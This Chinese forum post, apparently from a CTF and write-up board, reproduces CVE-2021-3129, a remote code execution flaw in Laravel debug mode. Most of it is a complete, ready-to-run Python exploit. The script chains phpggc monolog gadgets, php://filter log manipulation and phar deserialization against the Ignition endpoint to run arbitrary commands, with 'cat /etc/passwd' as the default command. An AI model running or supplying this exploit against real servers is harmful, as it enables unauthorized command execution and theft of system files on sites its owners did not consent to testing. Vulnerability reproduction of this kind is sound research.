论坛首页 > CTF&WP专版

Laravel 漏洞复现

Track-mss   ·   发表于 2021-08-25 11:55:04   ·   CTF&WP专版

0x01 Laravel Debug mode RCE(CVE-2021-3129)

step1:验证
首先构造如下post包: 

  1. POST /_ignition/execute-solution HTTP/1.1
  2. Host: 192.168.0.76:8888
  3. Content-Type: application/json
  4. Content-Length: 168
  6. {
  7.   "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  8.   "parameters": {
  9.     "variableName": "username",
  10.     "viewFile": "xxxxxxx"
  11.   }
  12. }

如果页面出现下列错误


说明漏洞存在

step2:利用
首先确定本地 php环境高于5.6
执行git clone https://github.com/ambionics/phpggc.git
确定 本地的 是使用’python’ 还是 ‘python3’ 进入本地环境,在文件夹内新建exp.py,内容如下:

  1. #!/usr/bin/python3
  3. import requests as req
  4. import os, uuid
  6. # 注意,这里的`python`根据本地情况,比如换成`python3`
  7. class Exp:
  8.     __gadget_chains = {
  9.         "monolog_rce1": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
  10.         "monolog_rce2": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
  11.         "monolog_rce3": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
  12.     }  # phpggc链集合,暂时添加rce1后续再添加其他增强通杀能力
  14.     __delimiter_len = 8  # 定界符长度
  16.     def __vul_check(self):
  17.         resp = req.get(self.__url, verify=False)
  18.         if resp.status_code != 405 and "laravel" not in resp.text:
  19.             return False
  20.         return True
  22.     def __payload_send(self, payload):
  23.         header = {
  24.             "Accept": "application/json"
  25.         }
  26.         data = {
  27.             "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  28.             "parameters": {
  29.                 "variableName": "cve20213129",
  30.                 "viewFile": ""
  31.             }
  32.         }
  33.         data["parameters"]["viewFile"] = payload
  34.         resp = req.post(self.__url, headers=header, json=data, verify=False)
  35.         # print(resp.text)
  36.         return resp
  38.     def __command_handler(self, command):
  39.         """
  40.         因为用户命令要注入到payload生成的命令中,为了防止影响结构,所以进行一些处理。
  41.         """
  43.         self.__delimiter = str(uuid.uuid1())[:self.__delimiter_len]  # 定界符用于定位页面中命令执行结果的位置。
  44.         # print(delimiter)
  45.         command = "echo %s && %s && echo %s" % (self.__delimiter, command, self.__delimiter)
  46.         # print(command)
  48.         escaped_chars = [' ', '&', '|']  # 我只想到这么多,可自行添加。
  49.         for c in escaped_chars:
  50.             command = command.replace(c, '\\' + c)
  51.         # print(command)
  52.         return command
  54.     def __clear_log(self):
  55.         return self.__payload_send(
  56.             "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
  58.     def __gen_payload(self, gadget_chain):
  59.         gen_shell = self.__gadget_chains[gadget_chain] % (self.__command)
  60.         # print(gen_shell)
  61.         os.system(gen_shell)
  62.         with open('payload.txt', 'r') as f:
  63.             payload = f.read().replace('\n', '') + 'a'  # 添加一个字符使得两个完整的payload总是只有一个可以正常解码
  64.         os.system("rm payload.txt")
  65.         # print(payload)
  66.         return payload
  68.     def __decode_log(self):
  69.         return self.__payload_send(
  70.             "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
  72.     def __unserialize_log(self):
  73.         return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")
  75.     def __rce(self):
  76.         text = self.__unserialize_log().text
  77.         # print(text)
  79.         echo_find = text.find(self.__delimiter)
  80.         # print(echo_find)
  81.         if echo_find >= 0:
  82.             return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]
  83.         else:
  84.             return "[-] RCE echo is not found."
  86.     def exp(self):
  87.         for gadget_chain in self.__gadget_chains.keys():
  88.             print("[*] Try to use %s for exploitation." % (gadget_chain))
  89.             self.__clear_log()
  90.             self.__clear_log()
  91.             self.__payload_send('a' * 2)
  92.             self.__payload_send(self.__gen_payload(gadget_chain))
  93.             self.__decode_log()
  94.             print("[*] Result:")
  95.             print(self.__rce())
  97.     def __init__(self, target, command):
  98.         self.target = target
  99.         self.__url = req.compat.urljoin(target, "_ignition/execute-solution")
  100.         self.__command = self.__command_handler(command)
  101.         if not self.__vul_check():
  102.             print("[-] [%s] is seems not vulnerable." % (self.target))
  103.             print("[*] You can also call obj.exp() to force an attack.")
  104.         else:
  105.             self.exp()
  108. def main():
  109.     Exp("这里是目标地址", "cat /etc/passwd")
  112. if __name__ == '__main__':
  113.     main()

最终目录结构如下

最终结果如下:

打赏我,让我更有动力~

0 条回复   |  直到 2021-8-25 | 775 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.